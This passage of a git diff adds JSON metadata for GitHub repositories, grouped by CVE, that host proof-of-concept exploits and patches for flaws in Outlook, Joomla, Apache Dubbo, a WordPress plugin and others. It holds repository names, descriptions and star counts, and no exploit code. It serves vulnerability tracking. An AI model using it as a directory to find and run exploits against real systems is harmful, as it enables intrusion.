"updated_at": "2023-07-19T08:15:31Z", + "pushed_at": "2023-03-18T21:49:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 615967703, + "name": "CVE-2023-23397-POC-Using-Interop-Outlook", + "full_name": "ahmedkhlief\/CVE-2023-23397-POC-Using-Interop-Outlook", + "owner": { + "login": "ahmedkhlief", + "id": 24752712, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24752712?v=4", + "html_url": "https:\/\/github.com\/ahmedkhlief", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahmedkhlief\/CVE-2023-23397-POC-Using-Interop-Outlook", + "description": null, + "fork": false, + "created_at": "2023-03-19T08:07:58Z", + "updated_at": "2023-03-19T20:10:03Z", + "pushed_at": "2023-03-19T08:10:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 616567479, + "name": "CVE-2023-23397", + "full_name": "Trackflaw\/CVE-2023-23397", + "owner": { + "login": "Trackflaw", + "id": 78696986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4", + "html_url": "https:\/\/github.com\/Trackflaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2023-23397", + "description": "Simple PoC of the CVE-2023-23397 vulnerability with the payload sent by email.", + "fork": false, + "created_at": "2023-03-20T16:31:54Z", + "updated_at": "2024-11-09T05:34:42Z", + "pushed_at": "2023-03-24T10:46:38Z", + "stargazers_count": 123, + "watchers_count": 123, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-23397" + ], + "visibility": "public", + "forks": 27, + "watchers": 123, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 616598036, + "name": "CVE-2023-23397", + "full_name": "SecCTechs\/CVE-2023-23397", + "owner": { + "login": "SecCTechs", + "id": 128412391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128412391?v=4", + "html_url": "https:\/\/github.com\/SecCTechs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecCTechs\/CVE-2023-23397", + "description": "Patch for MS Outlook Critical Vulnerability - CVSS 9.8", + "fork": false, + "created_at": "2023-03-20T17:45:37Z", + "updated_at": "2023-03-29T13:38:43Z", + "pushed_at": "2023-03-20T17:55:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 617122203, + "name": "CVE-2023-23397", + "full_name": "tiepologian\/CVE-2023-23397", + "owner": { + "login": "tiepologian", + "id": 4747002, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4747002?v=4", + "html_url": "https:\/\/github.com\/tiepologian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tiepologian\/CVE-2023-23397", + "description": "Proof of Concept for CVE-2023-23397 in Python", + "fork": false, + "created_at": "2023-03-21T18:38:00Z", + "updated_at": "2023-12-19T03:04:22Z", + "pushed_at": "2023-03-21T18:43:50Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 617419137, + "name": "cve-2023-23397", + "full_name": "BronzeBee\/cve-2023-23397", + "owner": { + "login": "BronzeBee", + "id": 16874131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16874131?v=4", + "html_url": "https:\/\/github.com\/BronzeBee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BronzeBee\/cve-2023-23397", + "description": "Python script for sending e-mails with CVE-2023-23397 payload using SMTP", + "fork": false, + "created_at": "2023-03-22T11:00:47Z", + "updated_at": "2024-09-17T14:09:06Z", + "pushed_at": "2023-03-22T12:38:26Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 617968206, + "name": "CVE-2023-23397", + "full_name": "shaolinsec\/CVE-2023-23397", + "owner": { + "login": "shaolinsec", + "id": 80222096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80222096?v=4", + "html_url": "https:\/\/github.com\/shaolinsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shaolinsec\/CVE-2023-23397", + "description": null, + "fork": false, + "created_at": "2023-03-23T13:40:18Z", + "updated_at": "2023-03-23T13:41:23Z", + "pushed_at": "2023-03-23T14:04:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 618584783, + "name": "CVE-2023-23397-Report", + "full_name": "Cyb3rMaddy\/CVE-2023-23397-Report", + "owner": { + "login": "Cyb3rMaddy", + "id": 61891953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61891953?v=4", + "html_url": "https:\/\/github.com\/Cyb3rMaddy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyb3rMaddy\/CVE-2023-23397-Report", + "description": "An exploitation demo of Outlook Elevation of Privilege Vulnerability", + "fork": false, + "created_at": "2023-03-24T19:47:42Z", + "updated_at": "2023-03-24T19:47:42Z", + "pushed_at": "2023-03-24T19:51:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 618586824, + "name": "CVE-2023-23397-Patch", + "full_name": "Zeppperoni\/CVE-2023-23397-Patch", + "owner": { + "login": "Zeppperoni", + "id": 63176507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63176507?v=4", + "html_url": "https:\/\/github.com\/Zeppperoni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zeppperoni\/CVE-2023-23397-Patch", + "description": "CVE-2023-23397 powershell patch script for Windows 10 and 11 ", + "fork": false, + "created_at": "2023-03-24T19:54:21Z", + "updated_at": "2023-03-24T20:21:42Z", + "pushed_at": "2023-03-24T20:50:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 620585634, + "name": "CVE-2023-23397", + "full_name": "jacquesquail\/CVE-2023-23397", + "owner": { + "login": "jacquesquail", + "id": 4651543, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4651543?v=4", + "html_url": "https:\/\/github.com\/jacquesquail", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jacquesquail\/CVE-2023-23397", + "description": null, + "fork": false, + "created_at": "2023-03-29T01:17:22Z", + "updated_at": "2023-05-04T14:20:15Z", + "pushed_at": "2023-03-29T01:20:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 621625300, + "name": "CVE-2023-23397-POC", + "full_name": "3yujw7njai\/CVE-2023-23397-POC", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2023-23397-POC", + "description": "CVE-2023-23397漏洞的简单PoC,有效载荷通过电子邮件发送。", + "fork": false, + "created_at": "2023-03-31T03:35:30Z", + "updated_at": "2023-11-06T07:57:19Z", + "pushed_at": "2023-03-31T03:37:30Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 637495980, + "name": "CVE-2023-23397", + "full_name": "vlad-a-man\/CVE-2023-23397", + "owner": { + "login": "vlad-a-man", + "id": 94809865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94809865?v=4", + "html_url": "https:\/\/github.com\/vlad-a-man", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vlad-a-man\/CVE-2023-23397", + "description": "CVE-2023-23397 PoC", + "fork": false, + "created_at": "2023-05-07T18:21:35Z", + "updated_at": "2024-11-12T20:22:46Z", + "pushed_at": "2023-05-07T18:47:36Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 666573953, + "name": "OutlookNTLM_CVE-2023-23397", + "full_name": "Muhammad-Ali007\/OutlookNTLM_CVE-2023-23397", + "owner": { + "login": "Muhammad-Ali007", + "id": 64638296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64638296?v=4", + "html_url": "https:\/\/github.com\/Muhammad-Ali007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Muhammad-Ali007\/OutlookNTLM_CVE-2023-23397", + "description": null, + "fork": false, + "created_at": "2023-07-14T22:02:55Z", + "updated_at": "2023-08-06T00:14:02Z", + "pushed_at": "2023-07-15T11:21:52Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 20, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 710229482, + "name": "CVE-2023-23397", + "full_name": "Pushkarup\/CVE-2023-23397", + "owner": { + "login": "Pushkarup", + "id": 148672587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148672587?v=4", + "html_url": "https:\/\/github.com\/Pushkarup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pushkarup\/CVE-2023-23397", + "description": "This script exploits CVE-2023-23397, a Zero-Day vulnerability in Microsoft Outlook, allowing the generation of malicious emails for testing and educational purposes.", + "fork": false, + "created_at": "2023-10-26T09:26:32Z", + "updated_at": "2024-02-22T17:54:41Z", + "pushed_at": "2023-10-26T10:11:19Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736472941, + "name": "CVE-2023-23397", + "full_name": "ducnorth2712\/CVE-2023-23397", + "owner": { + "login": "ducnorth2712", + "id": 112828799, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112828799?v=4", + "html_url": "https:\/\/github.com\/ducnorth2712", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ducnorth2712\/CVE-2023-23397", + "description": null, + "fork": false, + "created_at": "2023-12-28T02:20:57Z", + "updated_at": "2023-12-28T02:20:58Z", + "pushed_at": "2023-12-28T02:20:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 753987117, + "name": "CVE-2023-23397-POC", + "full_name": "sarsaeroth\/CVE-2023-23397-POC", + "owner": { + "login": "sarsaeroth", + "id": 159212133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159212133?v=4", + "html_url": "https:\/\/github.com\/sarsaeroth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sarsaeroth\/CVE-2023-23397-POC", + "description": "C implementation of Outlook 0-click vulnerability", + "fork": false, + "created_at": "2024-02-07T07:08:55Z", + "updated_at": "2024-02-07T07:08:55Z", + "pushed_at": "2024-02-07T07:08:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 774844975, + "name": "CVE-2023-23397-PoW", + "full_name": "TheUnknownSoul\/CVE-2023-23397-PoW", + "owner": { + "login": "TheUnknownSoul", + "id": 58050201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58050201?v=4", + "html_url": "https:\/\/github.com\/TheUnknownSoul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheUnknownSoul\/CVE-2023-23397-PoW", + "description": "Proof of Work of CVE-2023-23397 for vulnerable Microsoft Outlook client application.", + "fork": false, + "created_at": "2024-03-20T09:49:01Z", + "updated_at": "2024-03-20T10:39:45Z", + "pushed_at": "2024-03-20T10:39:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploitation", + "hacking", + "msoutlook", + "netntlm", + "smb" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818675920, + "name": "CVE-2023-23397", + "full_name": "Symbolexe\/CVE-2023-23397", + "owner": { + "login": "Symbolexe", + "id": 140549630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140549630?v=4", + "html_url": "https:\/\/github.com\/Symbolexe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Symbolexe\/CVE-2023-23397", + "description": "CVE-2023-23397: Remote Code Execution Vulnerability in Microsoft Outlook", + "fork": false, + "created_at": "2024-06-22T14:25:39Z", + "updated_at": "2024-06-22T14:27:16Z", + "pushed_at": "2024-06-22T14:27:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23488.json b/2023/CVE-2023-23488.json new file mode 100644 index 0000000000..1db41de9f2 --- /dev/null +++ b/2023/CVE-2023-23488.json @@ -0,0 +1,64 @@ +[ + { + "id": 596406519, + "name": "CVE-2023-23488-PoC", + "full_name": "long-rookie\/CVE-2023-23488-PoC", + "owner": { + "login": "long-rookie", + "id": 74786634, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74786634?v=4", + "html_url": "https:\/\/github.com\/long-rookie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/long-rookie\/CVE-2023-23488-PoC", + "description": "Unauthenticated SQL Injection - Paid Memberships Pro < 2.9.8 (WordPress Plugin)", + "fork": false, + "created_at": "2023-02-02T05:28:09Z", + "updated_at": "2023-02-01T03:44:12Z", + "pushed_at": "2023-01-24T18:33:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 650732350, + "name": "CVE-2023-23488-pmpro-2.8", + "full_name": "cybfar\/CVE-2023-23488-pmpro-2.8", + "owner": { + "login": "cybfar", + "id": 96472592, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96472592?v=4", + "html_url": "https:\/\/github.com\/cybfar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cybfar\/CVE-2023-23488-pmpro-2.8", + "description": "Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2023-06-07T17:30:25Z", + "updated_at": "2023-06-08T01:12:01Z", + "pushed_at": "2023-06-07T22:10:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23531.json b/2023/CVE-2023-23531.json new file mode 100644 index 0000000000..3324f333d1 --- /dev/null +++ b/2023/CVE-2023-23531.json @@ -0,0 +1,33 @@ +[ + { + "id": 622392634, + "name": "MonkeyJB", + "full_name": "DarthOCE\/MonkeyJB", + "owner": { + "login": "DarthOCE", + "id": 85499155, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85499155?v=4", + "html_url": "https:\/\/github.com\/DarthOCE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DarthOCE\/MonkeyJB", + "description": "A fully functional untethered iOS 16-16-4 jailbreak using the CVE-2023-23531 vulnerability ", + "fork": false, + "created_at": "2023-04-02T01:03:13Z", + "updated_at": "2024-02-21T00:26:30Z", + "pushed_at": "2023-04-02T01:04:32Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23583.json b/2023/CVE-2023-23583.json new file mode 100644 index 0000000000..5110bff735 --- /dev/null +++ b/2023/CVE-2023-23583.json @@ -0,0 +1,33 @@ +[ + { + "id": 722159332, + "name": "CVE-2023-23583-Reptar-", + "full_name": "Mav3r1ck0x1\/CVE-2023-23583-Reptar-", + "owner": { + "login": "Mav3r1ck0x1", + "id": 55414177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55414177?v=4", + "html_url": "https:\/\/github.com\/Mav3r1ck0x1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mav3r1ck0x1\/CVE-2023-23583-Reptar-", + "description": "This script can help determine the CPU ID for the processor of your system, please note that I have not added every CPU ID to this script, edit as needed.", + "fork": false, + "created_at": "2023-11-22T15:02:49Z", + "updated_at": "2023-11-22T15:07:44Z", + "pushed_at": "2023-11-24T18:04:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23607.json b/2023/CVE-2023-23607.json new file mode 100644 index 0000000000..3c1f277148 --- /dev/null +++ b/2023/CVE-2023-23607.json @@ -0,0 +1,33 @@ +[ + { + "id": 815845980, + "name": "CVE-2023-23607", + "full_name": "Pylonet\/CVE-2023-23607", + "owner": { + "login": "Pylonet", + "id": 135266995, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135266995?v=4", + "html_url": "https:\/\/github.com\/Pylonet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pylonet\/CVE-2023-23607", + "description": null, + "fork": false, + "created_at": "2024-06-16T10:50:32Z", + "updated_at": "2024-06-18T15:41:04Z", + "pushed_at": "2024-06-18T15:41:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23638.json b/2023/CVE-2023-23638.json new file mode 100644 index 0000000000..0786dfcd87 --- /dev/null +++ b/2023/CVE-2023-23638.json @@ -0,0 +1,95 @@ +[ + { + "id": 617427518, + "name": "Dubbo-RCE", + "full_name": "X1r0z\/Dubbo-RCE", + "owner": { + "login": "X1r0z", + "id": 28532286, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28532286?v=4", + "html_url": "https:\/\/github.com\/X1r0z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X1r0z\/Dubbo-RCE", + "description": "PoC of Apache Dubbo CVE-2023-23638", + "fork": false, + "created_at": "2023-03-22T11:23:44Z", + "updated_at": "2024-05-20T10:43:33Z", + "pushed_at": "2024-01-29T02:38:52Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 31, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 639303406, + "name": "Apache-Dubbo-CVE-2023-23638-exp", + "full_name": "YYHYlh\/Apache-Dubbo-CVE-2023-23638-exp", + "owner": { + "login": "YYHYlh", + "id": 28374935, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28374935?v=4", + "html_url": "https:\/\/github.com\/YYHYlh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YYHYlh\/Apache-Dubbo-CVE-2023-23638-exp", + "description": "Apache Dubbo (CVE-2023-23638)漏洞利用的工程化实践", + "fork": false, + "created_at": "2023-05-11T07:37:52Z", + "updated_at": "2024-11-13T09:22:35Z", + "pushed_at": "2023-08-08T02:30:25Z", + "stargazers_count": 218, + "watchers_count": 218, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 218, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 650918802, + "name": "CVE-2023-23638-Tools", + "full_name": "3yujw7njai\/CVE-2023-23638-Tools", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2023-23638-Tools", + "description": null, + "fork": false, + "created_at": "2023-06-08T05:14:01Z", + "updated_at": "2023-06-08T05:14:02Z", + "pushed_at": "2023-06-08T05:15:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2375.json b/2023/CVE-2023-2375.json new file mode 100644 index 0000000000..afbb75ea5a --- /dev/null +++ b/2023/CVE-2023-2375.json @@ -0,0 +1,33 @@ +[ + { + "id": 823381127, + "name": "HTB-Devvortex-CVE-2023-2375-PoC", + "full_name": "0x0jr\/HTB-Devvortex-CVE-2023-2375-PoC", + "owner": { + "login": "0x0jr", + "id": 166342298, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166342298?v=4", + "html_url": "https:\/\/github.com\/0x0jr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x0jr\/HTB-Devvortex-CVE-2023-2375-PoC", + "description": "CVE-2023-23752 Unauthenticated Information Disclosure Showcase Using Devvortex From HTB.", + "fork": false, + "created_at": "2024-07-02T23:50:31Z", + "updated_at": "2024-07-03T00:46:26Z", + "pushed_at": "2024-07-03T00:46:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23752.json b/2023/CVE-2023-23752.json new file mode 100644 index 0000000000..39bfd3aad2 --- /dev/null +++ b/2023/CVE-2023-23752.json @@ -0,0 +1,1490 @@ +[ + { + "id": 603288698, + "name": "CVE-2023-23752", + "full_name": "yusinomy\/CVE-2023-23752", + "owner": { + "login": "yusinomy", + "id": 93922728, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93922728?v=4", + "html_url": "https:\/\/github.com\/yusinomy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yusinomy\/CVE-2023-23752", + "description": " Joomla! 未授权访问漏洞", + "fork": false, + "created_at": "2023-02-18T03:36:54Z", + "updated_at": "2023-02-20T06:40:56Z", + "pushed_at": "2023-02-18T03:40:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 603407349, + "name": "CVE-2023-23752", + "full_name": "Saboor-Hakimi\/CVE-2023-23752", + "owner": { + "login": "Saboor-Hakimi", + "id": 44523544, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44523544?v=4", + "html_url": "https:\/\/github.com\/Saboor-Hakimi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Saboor-Hakimi\/CVE-2023-23752", + "description": "CVE-2023-23752 nuclei template", + "fork": false, + "created_at": "2023-02-18T12:19:24Z", + "updated_at": "2024-02-14T07:47:20Z", + "pushed_at": "2023-02-18T12:39:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604098295, + "name": "joomla_CVE-2023-23752", + "full_name": "Vulnmachines\/joomla_CVE-2023-23752", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/joomla_CVE-2023-23752", + "description": " Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.", + "fork": false, + "created_at": "2023-02-20T10:30:17Z", + "updated_at": "2023-10-14T07:30:50Z", + "pushed_at": "2023-02-20T10:43:20Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604431570, + "name": "CVE-2023-23752", + "full_name": "sw0rd1ight\/CVE-2023-23752", + "owner": { + "login": "sw0rd1ight", + "id": 44807635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44807635?v=4", + "html_url": "https:\/\/github.com\/sw0rd1ight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sw0rd1ight\/CVE-2023-23752", + "description": "Poc for CVE-2023-23752 (joomla CMS)", + "fork": false, + "created_at": "2023-02-21T03:26:58Z", + "updated_at": "2023-12-29T10:29:12Z", + "pushed_at": "2023-02-18T21:09:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 605359170, + "name": "CVE-2023-23752-poc", + "full_name": "wangking1\/CVE-2023-23752-poc", + "owner": { + "login": "wangking1", + "id": 94971285, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94971285?v=4", + "html_url": "https:\/\/github.com\/wangking1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wangking1\/CVE-2023-23752-poc", + "description": "CVE-2023-23752 poc", + "fork": false, + "created_at": "2023-02-23T01:40:38Z", + "updated_at": "2023-02-23T01:48:23Z", + "pushed_at": "2023-02-23T01:44:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 605362106, + "name": "joomla_CVE-2023-23752", + "full_name": "ibaiw\/joomla_CVE-2023-23752", + "owner": { + "login": "ibaiw", + "id": 86768711, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86768711?v=4", + "html_url": "https:\/\/github.com\/ibaiw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ibaiw\/joomla_CVE-2023-23752", + "description": "未授权访问漏洞", + "fork": false, + "created_at": "2023-02-23T01:52:02Z", + "updated_at": "2023-03-02T03:03:03Z", + "pushed_at": "2023-03-02T03:03:00Z", + 